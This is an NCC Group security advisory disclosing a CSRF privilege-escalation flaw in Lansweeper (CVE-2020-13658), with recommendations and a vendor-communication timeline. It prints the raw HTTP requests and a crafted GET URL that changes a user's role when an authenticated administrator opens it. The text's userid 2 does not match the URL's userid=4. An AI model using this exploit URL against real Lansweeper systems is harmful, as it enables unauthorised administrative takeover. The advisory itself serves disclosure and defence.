Saltar a la navegación Saltar al contenido principal Ir al pie de página

Technical Advisory – Lansweeper Privilege Escalation via CSRF Using HTTP Method Interchange (CVE-2020-13658)

25 septiembre 2020

By Joshua Dow

Vendor: Lansweeper Software
Vendor URL: https://www.lansweeper.com/
Versions affected: 8.0.130.17 known affected versions, others likely
Systems Affected: Windows 10
Authors: Joshua Dow , Daniel King 
Advisory URL / CVE Identifier: CVE-2020-13658
Risk: High

Summary:

Lansweeper is an application that gathers hardware and software information of computers and other devices on a computer network for management and compliance and audit purposes. The application also encompasses a ticket based help desk system and capabilities for software updates on target devices.

Location:

http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/HelpdeskusersActions.aspx

Impact:

An attacker with an existing user account can elevate their privileges within the Lansweeper application.

Details:

Lansweeper allows an administrator to change the roles and permissions granted to a given application user via the /configuration/HelpdeskUsers/HelpdeskusersActions.aspx page. Normal usage of the application sends a POST request similar to the following when a user’s role is changed.

  POST /configuration/HelpdeskUsers/HelpdeskusersActions.aspx HTTP/1.1
  Host: [LANSWEEPER_URL]
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  Content-Length: 64
  Connection: close
  Cookie: ASP.NET_SessionId=0cz3z0ocopzt04ddvo5514fo; UserSettings=language=1; custauth=username=admin userdomain=admin

  userid=4 originalvalue= permissionselect=2 action=SELECTtblusers

The application also protects its session cookie (ASP.NET_SessionId) with the samesite=lax parameter. This prevents several instances of traditional CSRF attacks (such as resources being loaded from image tags, or forms sending POST requests from an alternate domain).

An attacker can bypass these protections by modifying the previous request to use the GET HTTP method instead of the POST HTTP method and changing parameters specified in the POST body to URL parameters instead. Doing so results in the following:

  GET /configuration/HelpdeskUsers/HelpdeskusersActions.aspx?userid=4 originalvalue= permissionselect=1 action=SELECTtblusers HTTP/1.1
  Host: [LANSWEEPER_URL]
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/
  X-Requested-With: XMLHttpRequest
  Connection: close
  Cookie: ASP.NET_SessionId=cpa4aol20zham0xmmcjxjl2e; UserSettings=language=1; custauth=username=admin userdomain=admin

Which can be shorted to the following URL:

http://[LANSWEEPER_URL]/configuration/HelpdeskUsers/HelpdeskusersActions.aspx?userid=4 originalvalue= permissionselect=1 action=SELECTtblusers

If a Lansweeper administrator browses to the above URL while authenticated to the Lansweeper application, the user specified in the userid parameter will have their privileges set to those specified in the permissionselect parameter. In this case the user with the userid 2 has their permission set to “Administrator + Agent”.

Recommendation:

  • Update to the latest version of Lansweeper, which at the time of writing is 8.0.130.37
  • Restrict access to the Lansweeper management console as much as possible. Ideally limiting access to only a small set of highly-trusted users.
  • If possible, use a separate browser whose only purpose is accessing and managing the Lansweeper application.

Vendor Communication:

  • May 14th, 2020 – NCC Group reached out to Lansweeper to identify appropriate security contact.
  • May 19th, 2020 – Lansweeper opens a case with their development team to look into the issue.
  • May 28th, 2020 – NCC Group registers the associated CVE.
  • May 28th, 2020 – NCC Group follows up with Lansweeper, and provides them with reserved CVE number.
  • June 8th, 2020 – Lansweeper formally acknowledges the vulnerability but says a patch will take time, and notes a beta version can be provided by July 17th 2020.
  • July 13th, 2020 – Lansweeper provides NCC Group with a beta version of their product with their initial fix.
  • July 14th, 2020 – Lansweeper provides NCC group with a license to use the beta product.
  • July 21st, 2020 – NCC Group investigates the fix and notifies Lansweeper that the CSRF protections implemented are fragile and only protect one endpoint.
  • July 30th, 2020 – Lansweeper replies stating that NCC Group’s feedback on the patch was received and forwarded to the development team.
  • August 13th, 2020 – Lansweeper publishes their patch notes.
  • September 4th, 2020 – NCC Group reaches out to Lansweeper to confirm if feedback on the patch was received and is being incorporated. Lansweeper informs NCC Group that they have agreed internally to incorporate feedback into a new patch targeting September 18th and requests that the advisory be postponed to accommodate. NCC Group agrees.
  • September 15th, 2020 – NCC Group reaches back out to Lansweeper to see if the updated patch is still expected to be ready to go on September 18th.
  • September 18th, 2020 – Lansweeper shows NCC Group some of the changes being incorporated into the patch and explains that it is not ready for public push yet.
  • September 18th, 2020 – NCC Group proposes to delay vulnerability publication until September 25th.
  • September 22nd, 2020 – Lansweeper agrees to publication of the vulnerability on September 25th.
  • September 25th, 2020 – Advisory published

Thanks to:

The security team at Lansweeper, Inc.

About NCC Group:

NCC Group is a global expert in cyber security and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape.

With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate and respond to the risks they face.

We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.